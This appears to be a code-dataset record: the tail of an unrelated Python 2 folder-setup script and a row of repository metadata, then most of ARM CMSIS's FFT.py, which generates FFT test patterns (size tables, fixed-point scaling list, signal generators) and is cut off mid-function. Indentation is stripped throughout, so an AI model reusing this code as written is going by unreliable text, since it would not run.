print 'erasing folder: '+LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG_L2
#for the_file in os.listdir(LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG_L2):
#file_path = os.path.join(LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG_L2, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if not os.path.isdir(LOCAL_DATASET_PATH_ASTRO_TRAC_TEMP):
print 'creating folder: '+LOCAL_DATASET_PATH_ASTRO_TRAC_TEMP
os.makedirs(LOCAL_DATASET_PATH_ASTRO_TRAC_TEMP)
else:
print 'erasing folder: '+LOCAL_DATASET_PATH_ASTRO_TRAC_TEMP
#for the_file in os.listdir(LOCAL_DATASET_PATH_ASTRO_TRAC_TEMP):
#file_path = os.path.join(LOCAL_DATASET_PATH_ASTRO_TRAC_TEMP, the_file)
#try:
#os.unlink(file_path)
#except Exception, e:
#print e
if __name__ == "__main__":
main() | 37.5 | 650 | 0.761504 | 1,526 | 9,975 | 4.536697 | 0.032765 | 0.233569 | 0.307381 | 0.120757 | 0.936877 | 0.886465 | 0.821465 | 0.71443 | 0.599162 | 0.47855 | 0 | 0.002521 | 0.125213 | 9,975 | 266 | 651 | 37.5 | 0.790855 | 0.380752 | 0 | 0.179487 | 0 | 0 | 0.11581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.025641 | null | null | 0.367521 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2394b3c750055942bd5d7d45e427cba0f773c70b | 25,899 | py | Python | Kernels/Research/FFT/FFT.py | WoodData/EndpointAI | 8e4d145ff45cf5559ab009eba4f423e944dc6975 | [
"Apache-2.0"
] | 190 | 2020-09-22T02:14:29.000Z | 2022-03-28T02:35:57.000Z | Kernels/Research/FFT/FFT.py | chuancqc/EndpointAI | ab67cefeae3c06f1c93f66812bcf988c14e72ff1 | [
"Apache-2.0"
] | 2 | 2021-08-30T10:06:22.000Z | 2021-11-05T20:37:58.000Z | Kernels/Research/FFT/FFT.py | chuancqc/EndpointAI | ab67cefeae3c06f1c93f66812bcf988c14e72ff1 | [
"Apache-2.0"
] | 80 | 2020-09-13T17:48:56.000Z | 2022-03-19T10:45:05.000Z | #
#
# Copyright (C) 2010-2021 ARM Limited or its affiliates. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the License); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os.path
import numpy as np
import itertools
import scipy.fftpack
import scipy.fft
import argparse
import sys
parser = argparse.ArgumentParser(description='Pattern generation')
parser.add_argument('-f', nargs='?',type = str, default="", help="Path to folder containing Patterns folder")
parser.add_argument('-r', nargs='?',type = str, help="CMSIS Root")
# -r is pointing to Pattern generation folder
# CMSIS/DSP/Testing/PatternGeneration/
args = parser.parse_args()
if args.r:
sys.path.append(args.r)
else:
sys.path.append("PatternGeneration")
import Tools
# Those patterns are used for tests and benchmarks.
# For tests, there is the need to add tests for saturation
# Radix 2,3 and 5
# Primary blocks are 8,6,5,4,3,2
# We take the square and then all combinations
PRIMARY=[8,6,5,4,3,2]
def cartesian(*somelists):
r=[]
for element in itertools.product(*somelists):
r.append(list(element))
return(r)
SECOND = [x*y for (x,y) in cartesian(PRIMARY,PRIMARY)]
THIRD = [x*y for (x,y) in cartesian(SECOND,PRIMARY)]
FFTSIZES = PRIMARY + SECOND + THIRD
FFTSIZES = sorted(list(set(FFTSIZES))) + [4096]
def iseven(a):
return(a%2==0)
# The real FFT size is only working on even length FFTs
REALFFTSIZES=list(filter(iseven,FFTSIZES))[1:-1] + [4096]
FFT2DSIZES=[(4,9),(8,4),(64,4)]
# [512, 384, 2, 3, 4, 5, 6, 256, 8, 9, 10, 128, 12, 15, 16, 144,
# 18, 20, 150, 24, 25, 27, 30, 32, 288, 160, 36, 40,
# 45, 48, 50, 180, 54, 60, 64, 320, 192, 200, 72, 75, 80,
# 216, 90, 96, 100, 108, 240, 120, 125]
#FFTSIZES=[4, 8, 6, 10, 15,16,32,64,9,27,81,5,25,125]
SINES=[0.25,0.5,0.9]
NOISES=[0.1,0.4]
FIXEDPOINTSCALING = [0, 1, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12]
def scaling(nb):
return(1.0 / (1 << FIXEDPOINTSCALING[nb-1]))
#print(FFTSIZES)
#print(REALFFTSIZES)
#print(FFT2DSIZES)
#
#quit()
def asReal(a):
#return(a.view(dtype=np.float64))
return(a.reshape(np.size(a)).view(dtype=np.float64))
def noiseSignal(nb):
return(np.random.randn(nb))
def sineSignal(freqRatio,nb):
fc = nb / 2.0
f = freqRatio*fc
time = np.arange(0,nb)
return(np.sin(2 * np.pi * f * time/nb))
def noisySineSignal(noiseAmp,r,nb):
return(noiseAmp*noiseSignal(nb) + r*sineSignal(0.25,nb))
def stepSignal(r,nb):
na = int(nb/2)
nb = nb - na
